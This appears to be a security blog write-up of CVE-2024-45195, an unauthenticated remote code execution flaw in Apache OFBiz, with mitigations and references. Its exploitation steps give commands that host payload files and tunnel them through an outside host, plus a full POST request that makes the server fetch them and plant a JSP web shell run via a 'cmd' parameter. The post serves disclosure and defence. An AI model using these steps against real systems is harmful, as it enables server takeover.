CVE-2024-45195: Apache OFBiz Unauthenticated Remote Code Execution (RCE)

Exploiting CVEs
September 9, 2025

Summary

CVE-2024-45195 is a critical vulnerability in Apache OFBiz, a widely used open-source enterprise resource planning (ERP) system with a CVSS score of 7.5 by NVD. The flaw enables unauthenticated remote code execution (RCE) due to an insecure use of Java's scripting engine within the web application's request handling logic.

Discovered in Apache OFBiz versions prior to 18.12.15, this vulnerability allows attackers to execute arbitrary code on the server without any authentication, leading to full system compromise. This exploit bypasses previously issued patches (CVE‑2024‑32113, ‑36104, ‑38856) by taking advantage of direct requests (“forced-browsing”) to reach Groovy service screens without authorization.

Technical Details

Before diving into the technical details, it's essential to have a high-level understanding of what Groovy is and what went wrong.

Groovy is a scripting language for the Java platform. It allows developers to write flexible, dynamic code that's easier to modify compared to pure Java. 

  • In Apache OFBiz, Groovy is used to build backend screens that perform admin-level tasks like exporting data or managing entities.

In OFBiz, users interact with "screens" (views) controlled by a combination of controller files and view maps. Earlier fixes focused only on securing the controller logic, assuming attackers wouldn't be able to access views directly.

However, by crafting specific URLs (via forced browsing), an attacker could bypass these controls and reach Groovy-based admin views. These screens were not individually protected, which opened the door to abuse.

Rapid7’s research links CVE-2024-45195 to earlier issues (CVE-2024-32113, CVE-2024-36104, CVE-2024-38856), all stemming from the same root cause: the controller and view-map state can be desynchronized via malicious URLs, allowing access to admin Groovy views without authentication.

Earlier patches attempted to normalize URIs by sanitizing path segments like .., ;, and %2e. Example patch from CVE‑2024‑36104:

String uRIFiltered = new URI(initialURI).normalize().toString()
    .replaceAll(";", "")
    .replaceAll("(?i)%2e", "");
if (!initialURI.equals(uRIFiltered)) {
  Debug.logError(...);
  throw new RuntimeException(...);
}

However, these fixes didn't cover all desynchronization vectors, and new paths still allowed bypass.

The OFBiz system includes several Groovy screens intended for administrative purposes. Some of them include:

  • EntitySQLProcessor.groovy
  • ProgramExport.groovy
  • XmlDsDump.groovy
  • ViewDataFile.groovy

While some screens were blacklisted in earlier patches, others, like ViewDataFile.groovy and  XmlDsDump.groovy, were overlooked. ViewDataFile.groovy screen accepts parameters from HTTP requests to load and write files, which an attacker can exploit.

The ViewDataFile.groovy screen uses request parameters:

dataFileSave = request.getParameter('DATAFILE_SAVE')
// ...
if (DATAFILE_SAVE) {
  // Writes downloaded file into specified path
}

By crafting a POST request to /webtools/control/forgotPassword/viewdatafile, attackers can:

  1. Supply DATAFILE_LOCATION & DEFINITION_LOCATION pointing to attacker-hosted XML/CSV

  2. Set DATAFILE_SAVE to a JSP within the web root (...index.jsp)

OFBiz fetches attacker files, saves a JSP shell, and allows execution via HTTP ?cmd=

Exploitation Steps

The attack targets the exposed ViewDataFile.groovy screen, which:

  • Accepts a data schema (XML) and a data file (CSV) via URL. [ Exploit Source: Rapid7 ]
  • Parses and processes them without authentication.
  • Optionally writes the resulting file to a given local path.

By supplying:

  • A schema that tells OFBiz how to interpret the input.
  • A payload that contains JSP code.
  • A path pointing to a .jsp location in the webroot...

We can trick OFBiz into writing a web shell that executes commands on the server.

Step 1 → Craft the Schema File (schema.xml)

Attackers first prepare a malicious schema definition (XML) that tells OFBiz how to interpret the structure of a data file. Normally, these schema files are used for defining CSV structures (e.g., column length, data type, etc.).

  • Instead of normal CSV data, this schema will instruct OFBiz to interpret malicious JSP code as valid input.

Step 2 → Craft the Payload File (report.csv)

Next, attackers prepare a data file (CSV) that matches the schema definition. In the exploit, instead of plain text values, the attacker inserts server-side executable code (JSP). 

Once processed by OFBiz, the uploaded data file is written directly into a web-accessible directory (such as /accounting/index.jsp).

Step 3 → Serve the Files Locally

To make the files accessible to OFBiz, you need to host them temporarily:


$ python3 -m http.server 8999

Then, make that local server available on the internet using SSH tunneling:


$ ssh -p 2222 -R 8999:localhost:8999 sish.revsh.net

sish.revsh.net is used to port-forward your local Python HTTP server to the public internet. OFBiz will download the schema and payload from this tunnelled location.

Step 4 → Send the Exploit Request

With both files publicly accessible, send a POST request to the vulnerable Groovy screen [Assuming the lab is running on vulnerable-app.com:8443 ]:

POST /webtools/control/forgotPassword/viewdatafile HTTP/1.1 
Host: vulnerable-app:8443 
Content-Type: application/x-www-form-urlencoded
 
DATAFILE_LOCATION=http://sish.revsh.net:8999/report.csv&DATAFILE_SAVE=./applications/accounting/webapp/accounting/index.jsp&DATAFILE_IS_URL=true&DEFINITION_LOCATION=http://sish.revsh.net:8999/schema.xml&DEFINITION_IS_URL=true&DEFINITION_NAME=rce

Step 5 → Access the JSP Web Shell

Once the file is written, navigate to http://vulnerable-app.com:8443/accounting/index.jsp?cmd=id

Since index.jsp now contains our command execution shell; it executes id on the server.

JSP Web Shell executed

You now have done remote code execution as the user running Apache OFBiz.

Mitigations

  1. Fixed in Apache OFBiz 18.12.16, where view-level authorization checks were added for all Groovy screens, not just controller maps. Update to the latest versions available.

  2. If upgrading immediately is not possible:
    Temporarily disable or restrict access to the following screen:
    /webtools/control/forgotPassword/viewdatafile
  3. For additional hardening, avoid exposing Apache OFBiz directly to the public internet.

References

  1. https://www.rapid7.com/blog/post/2024/09/05/cve-2024-45195-apache-ofbiz-unauthenticated-remote-code-execution-fixed/
  2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45195
Related posts :

Exploiting CVEs

Exploiting CVEs
September 1, 2025

CVE-2024-10924: Exploiting Critical WordPress Plugin Vulnerability

In November 2024, a critical vulnerability, tracked as CVE-2024-10924, was discovered in the Really Simple Security plugin for WordPress, affecting versions 9.0.0 to 9.1.1.1. With a CVSS score of 9.8, this authentication bypass flaw poses a severe risk to WordPress sites, potentially allowing attackers to gain unauthorized administrative access.
Read More
Exploiting CVEs
August 9, 2025

CVE-2025-3248 | Langflow Unauthenticated Remote Code Execution Vulnerability

Langflow (before version 1.3.0) had a feature that allowed people to submit Python code snippets so the server could “check” them. Unfortunately, the way this was built meant the server wasn’t just checking the code, it was actually running pieces of it. That’s CVE-2025-3248, a critical unauthenticated remote code execution (RCE) vulnerability with a CVSS of 9.8.
Read More
Exploiting CVEs
August 25, 2025

CVE-2023-50164: Critical Apache Struts RCE Vulnerability

CVE-2023-50164, disclosed in 2023, is a critical path traversal vulnerability in Apache Struts, an open-source framework for building Java web applications using the Model-View-Controller (MVC) architecture.
Read More
Web App Security
Web App Security
May 4, 2022

The World of Web 3.0 & Blockchain

Interested in Blockchain? Want to understand what is Web3.0? Here is a short post to help you understand these..
Read More
Web App Security
October 20, 2017

3 Must Have Tools For Penetration Testers

Welcome folks. In the previous posts, we have been talking about web application penetration testing in depth. But in this…
Read More
Web App Security
January 24, 2018

Different tricks to get ‘XSS’

Hey guys. Welcome to the new post from ENCIPHERS. As we think, you must be knowing that Cross-Site Scripting is the most …
Read More

Mobile App Security

Mobile App Security
April 17, 2022

An analysis of the modern mobile applications for data security

Mobile phones have become an imperative portion of our daily lives. People nowadays prefer to keep every bit of information regarding personal and professional life on their mobile phones.
Read More
Mobile App Security
May 21, 2019

Mobexler : A Mobile Application Security Testing Platform

Mobexler is a Mobile Application Penetration Testing Platform, customised to include all tools required for penetration ...
Read More
Mobile App Security
July 2, 2023

Exploring Android Security: Safeguarding The Droid

The Android architecture implements different security layers that, together, enable a defense-in-depth approach. This means that the confidentiality, integrity or availability of sensitive user-data doesn't hinge on one single security measure.
Read More
An Award-Winning Cyber Security Consulting & Training Company
Email
Headquarter
Enciphers Labs Private Limited,
24th Floor, Tower B, Alphathum, Sector 90, Noida, Uttar Pradesh, India
Company
About usContact UsServicesTrainingBrand Kit
Useful links
Cyber Security PolicyData Protection PolicyResponsible DisclosurePrivacy PolicyHall Of Fame
© 2000-2022, All Rights Reserved

By clicking “Accept”, you agree to the storing of cookies on your device to enhance site usage. View our Privacy Policy for more information.

RejectAccept